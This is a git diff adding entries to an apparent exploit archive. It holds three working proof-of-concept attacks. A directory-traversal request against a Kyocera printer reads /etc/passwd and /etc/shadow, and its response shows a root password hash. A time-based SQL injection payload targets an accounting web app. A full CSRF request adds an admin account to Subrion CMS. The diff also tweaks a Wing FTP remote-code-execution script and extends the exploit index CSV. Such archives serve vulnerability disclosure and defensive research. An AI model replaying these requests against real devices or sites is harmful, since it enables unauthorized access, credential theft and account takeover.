diff --git a/exploits/hardware/webapps/50738.txt b/exploits/hardware/webapps/50738.txt new file mode 100644 index 000000000..c391a4df6 --- /dev/null +++ b/exploits/hardware/webapps/50738.txt @@ -0,0 +1,104 @@ +# Exploit Title: Kyocera Command Center RX ECOSYS M2035dn - Directory Traversal File Disclosure (Unauthenticated) +# Author: Luis Martinez +# Discovery Date: 2022-02-10 +# Vendor Homepage: https://www.kyoceradocumentsolutions.com/asia/en/products/business-application/command-center-rx.html +# Tested Version: ECOSYS M2035dn +# Tested on: Linux +# Vulnerability Type: Directory Traversal File Disclosure (Unauthenticated) + +# Proof of Concept: +# 1.- Create a directory traversal payload +# 2.- Add nullbyte to the end of the payload(%00) +# 3.- Sent your request + +Request 1: + +GET /js/../../../../../../../../etc/passwd%00.jpg HTTP/1.1 +Cookie: rtl=0 +Host: X.X.X.X +Connection: Keep-alive +Accept-Encoding: gzip,deflate +User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) +Accept: */* + +Response 1: + +HTTP/1.1 200 OK +Content-Length: 844 +Upgrade: TLS/1.0 +Accept-Encoding: identity +Date: Thu, 10 Feb 2022 15:55:57 GMT +Server: KM-MFP-http/V0.0.1 +Last-Modified: Thu, 10 Feb 2022 15:25:48 GMT +ETag: "/js/../../../../../../../../etc/passwd, Thu, 10 Feb 2022 15:25:48 GMT" +Content-Type: image/jpeg + +root:x:0:0:root:/root:/bin/sh +bin:x:1:1:bin:/bin:/bin/sh +daemon:x:2:2:daemon:/usr/sbin:/bin/sh +sys:x:3:3:sys:/dev:/bin/sh +adm:x:4:4:adm:/var/adm:/bin/sh +lp:x:5:7:lp:/var/spool/lpd:/bin/sh +sync:x:6:8:sync:/bin:/bin/sync +shutdown:x:7:9:shutdown:/sbin:/sbin/shutdown +halt:x:8:10:halt:/sbin:/sbin/halt +mail:x:9:11:mail:/var/mail:/bin/sh +news:x:10:12:news:/var/spool/news:/bin/sh +uucp:x:11:13:uucp:/var/spool/uucp:/bin/sh +operator:x:12:0:operator:/root:/bin/sh +games:x:13:60:games:/usr/games:/bin/sh +ftp:x:15:14:ftp:/var/ftp:/bin/sh +man:x:16:20:man:/var/cache/man:/bin/sh +www:x:17:18:www-data:/var/www:/bin/sh +sshd:x:18:19:sshd:/var/run/sshd:/bin/sh +proxy:x:19:21:proxy:/bin:/bin/sh +telnetd:x:20:22:proxy:/bin:/bin/sh +backup:x:34:34:backup:/var/backups:/bin/sh +ais:x:101:101:ais:/var/run/ais:/bin/sh +nobody:x:65534:65534:nobody:/nonexistent:/bin/sh + +Request 2: + +GET /js/../../../../../../../../etc/shadow%00.jpg HTTP/1.1 +Cookie: rtl=0 +Host: X.X.X.X +Connection: Keep-alive +Accept-Encoding: gzip,deflate +User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) +Accept: */* + +Response 2: + +HTTP/1.1 200 OK +Content-Length: 480 +Upgrade: TLS/1.0 +Accept-Encoding: identity +Date: Thu, 10 Feb 2022 16:10:16 GMT +Server: KM-MFP-http/V0.0.1 +Last-Modified: Thu, 10 Feb 2022 15:25:48 GMT +ETag: "/js/../../../../../../../../etc/shadow, Thu, 10 Feb 2022 15:25:48 GMT" +Content-Type: image/jpeg + +root:$1$7NzW9Q4N$hXTtMygKjVUdJtW86EH3t1:15873:::::: +bin:*:15873:::::: +daemon:*:15873:::::: +sys:*:15873:::::: +adm:*:15873:::::: +lp:*:15873:::::: +sync:*:15873:::::: +shutdown:*:15873:::::: +halt:*:15873:::::: +mail:*:15873:::::: +news:*:15873:::::: +uucp:*:15873:::::: +operator:*:15873:::::: +games:*:15873:::::: +ftp:*:15873:::::: +man:*:15873:::::: +www:*:15873:::::: +sshd:*:15873:::::: +proxy:*:15873:::::: +telnetd:*:15873:::::: +backup:*:15873:::::: +ais:*:15873:::::: +nobody:*:15873:::::: \ No newline at end of file diff --git a/exploits/php/webapps/50736.txt b/exploits/php/webapps/50736.txt new file mode 100644 index 000000000..187417284 --- /dev/null +++ b/exploits/php/webapps/50736.txt @@ -0,0 +1,31 @@ +# Exploit Title: Accounting Journal Management System 1.0 - 'id' SQLi (Authenticated) +# Exploit Author: Alperen Ergel +# Contact: @alpernae (IG/TW) +# Software Homepage: https://www.sourcecodester.com/php/15155/accounting-journal-management-system-trial-balance-php-free-source-code.html +# Version : 1.0 +# Tested on: windows 10 xammp | Kali linux +# Category: WebApp +# Google Dork: N/A +# Date: 09.02.2022 + +######## Description ######## +# +# +# Authenticate and get update user settings will be appear the +# id paramater put your payload at there it'll be work +# +# +# +######## Proof of Concept ######## + +========>>> REQUEST <<<========= + +GET /ajms/admin/?page=user/manage_user&id=5%27%20AND%20(SELECT%208928%20FROM%20(SELECT(SLEEP(10)))hVPW)%20AND%20%27qHYS%27=%27qHYS HTTP/1.1 +Host: localhost +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Connection: close +Cookie: PHPSESSID=r513r6hug9aqofhlfs3bc7f7qa +Upgrade-Insecure-Requests: 1 \ No newline at end of file diff --git a/exploits/php/webapps/50737.txt b/exploits/php/webapps/50737.txt new file mode 100644 index 000000000..4f9a01791 --- /dev/null +++ b/exploits/php/webapps/50737.txt @@ -0,0 +1,122 @@ +# Exploit Title: Subrion CMS 4.2.1 - Cross Site Request Forgery (CSRF) (Add Amin) +# Date: 2022-02-09 +# Exploit Author: Aryan Chehreghani +# Vendor Homepage: https://subrion.org +# Software Link: https://subrion.org/download +# Version: 4.2.1 +# Tested on: Windows 10 + +# [ About - Subrion CMS ]: +#Subrion is a PHP/MySQL based CMS & framework, +#that allows you to build websites for any purpose, +#Yes, from blog to corporate mega portal. + +# [ Description ]: +# CSRF vulnerability was discovered in 4.2.1 version of Subrion CMS, +# With this vulnerability, authorized users can be added to the system. + +# [ Sample CSRF Request ]: + +POST /subrion/panel/members/add/ HTTP/1.1 +Host: localhost +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko/20100101 Firefox/96.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Content-Type: multipart/form-data; boundary=---------------------------386122140640094420852486902 +Content-Length: 2522 +Origin: http://localhost +Connection: close +Referer: http://localhost/subrion/panel/members/add/ +Cookie: loader=loaded; INTELLI_ffd8ae8438=ftph4lgam8hugh8j0mgv8j4q2l +Upgrade-Insecure-Requests: 1 +Sec-Fetch-Dest: document +Sec-Fetch-Mode: navigate +Sec-Fetch-Site: same-origin +Sec-Fetch-User: ?1 + +-----------------------------386122140640094420852486902 +Content-Disposition: form-data; name="__st" + +YNXrr7MjSY0Qi0JYISJ7DRuC9Gd1zxPYwjHcFKVh +-----------------------------386122140640094420852486902 +Content-Disposition: form-data; name="username" + +Aryan +-----------------------------386122140640094420852486902 +Content-Disposition: form-data; name="fullname" + +AryanChehreghani +-----------------------------386122140640094420852486902 +Content-Disposition: form-data; name="email" + +aryanchehreghani@yahoo.com +-----------------------------386122140640094420852486902 +Content-Disposition: form-data; name="_password" + +Test1234! +-----------------------------386122140640094420852486902 +Content-Disposition: form-data; name="_password2" + +Test1234! +-----------------------------386122140640094420852486902 +Content-Disposition: form-data; name="usergroup_id" + +1 +-----------------------------386122140640094420852486902 +Content-Disposition: form-data; name="website" + + +-----------------------------386122140640094420852486902 +Content-Disposition: form-data; name="phone" + + +-----------------------------386122140640094420852486902 +Content-Disposition: form-data; name="biography" + + +-----------------------------386122140640094420852486902 +Content-Disposition: form-data; name="facebook" + + +-----------------------------386122140640094420852486902 +Content-Disposition: form-data; name="twitter" + + +-----------------------------386122140640094420852486902 +Content-Disposition: form-data; name="gplus" + + +-----------------------------386122140640094420852486902 +Content-Disposition: form-data; name="linkedin" + + +-----------------------------386122140640094420852486902 +Content-Disposition: form-data; name="email_language" + +en +-----------------------------386122140640094420852486902 +Content-Disposition: form-data; name="sponsored" + +0 +-----------------------------386122140640094420852486902 +Content-Disposition: form-data; name="featured" + +0 +-----------------------------386122140640094420852486902 +Content-Disposition: form-data; name="featured_end" + +2022-03-09 12:03 +-----------------------------386122140640094420852486902 +Content-Disposition: form-data; name="status" + +active +-----------------------------386122140640094420852486902 +Content-Disposition: form-data; name="save" + +1 +-----------------------------386122140640094420852486902 +Content-Disposition: form-data; name="goto" + +list +-----------------------------386122140640094420852486902-- \ No newline at end of file diff --git a/exploits/windows/remote/50720.py b/exploits/windows/remote/50720.py index e455fc9de..86a71ec03 100755 --- a/exploits/windows/remote/50720.py +++ b/exploits/windows/remote/50720.py @@ -1,4 +1,4 @@ -# Exploit Title: Wing FTP Server 4.3.8 - Remote Code Execution (RCE) (Authenticated) +# Exploit Title: Wing FTP Server - Authenticated RCE # Date: 02/06/2022 # Exploit Author: notcos # Credit: Credit goes to the initial discoverer of this exploit, Alex Haynes. @@ -54,7 +54,7 @@ else: r = requests.post(url, headers=headers, data=data) cookie = 'UIDADMIN=' + r.cookies['UIDADMIN'] print('Login successful - Cookie: ' + cookie) - url = "http://172.31.1.20:8080/admin_lua_script.html" + url = "http://" + target + ":" + targetport + "/admin_lua_script.html" headers = { "User-Agent": "Googlebot", "Cookie": cookie, diff --git a/files_exploits.csv b/files_exploits.csv index 1054b5176..71a967b46 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -44797,6 +44797,7 @@ id,file,description,date,author,type,platform,port 50717,exploits/multiple/webapps/50717.txt,"FileBrowser 2.17.2 - Cross Site Request Forgery (CSRF) to Remote Code Execution (RCE)",1970-01-01,"FEBIN MON SAJI",webapps,multiple, 50718,exploits/php/webapps/50718.txt,"Hospital Management System 4.0 - 'multiple' SQL Injection",1970-01-01,nu11secur1ty,webapps,php, 50719,exploits/php/webapps/50719.txt,"WordPress Plugin International Sms For Contact Form 7 Integration V1.2 - Cross Site Scripting (XSS)",1970-01-01,"Milad karimi",webapps,php, +50738,exploits/hardware/webapps/50738.txt,"Kyocera Command Center RX ECOSYS M2035dn - Directory Traversal File Disclosure (Unauthenticated)",1970-01-01,"Luis Martínez",webapps,hardware, 50721,exploits/php/webapps/50721.py,"Wordpress Plugin Simple Job Board 2.9.3 - Local File Inclusion",1970-01-01,Ven3xy,webapps,php, 50723,exploits/php/webapps/50723.txt,"WordPress Plugin Security Audit 1.0.0 - Stored Cross Site Scripting (XSS)",1970-01-01,"Shweta Mahajan",webapps,php, 50724,exploits/php/webapps/50724.txt,"WordPress Plugin CP Blocks 1.0.14 - Stored Cross Site Scripting (XSS)",1970-01-01,"Shweta Mahajan",webapps,php, @@ -44810,3 +44811,5 @@ id,file,description,date,author,type,platform,port 50733,exploits/php/webapps/50733.py,"WordPress Plugin Secure Copy Content Protection and Content Locking 2.8.1 - SQL-Injection (Unauthenticated)",1970-01-01,"Ron Jost",webapps,php, 50734,exploits/php/webapps/50734.txt,"WordPress Plugin Contact Form Builder 1.6.1 - Cross-Site Scripting (XSS)",1970-01-01,"Milad karimi",webapps,php, 50735,exploits/php/webapps/50735.txt,"WordPress Plugin Jetpack 9.1 - Cross Site Scripting (XSS)",1970-01-01,"Milad karimi",webapps,php, +50736,exploits/php/webapps/50736.txt,"Accounting Journal Management System 1.0 - 'id' SQLi (Authenticated)",1970-01-01,"Alperen Ergel",webapps,php, +50737,exploits/php/webapps/50737.txt,"Subrion CMS 4.2.1 - Cross Site Request Forgery (CSRF) (Add Amin)",1970-01-01,"Aryan Chehreghani",webapps,php,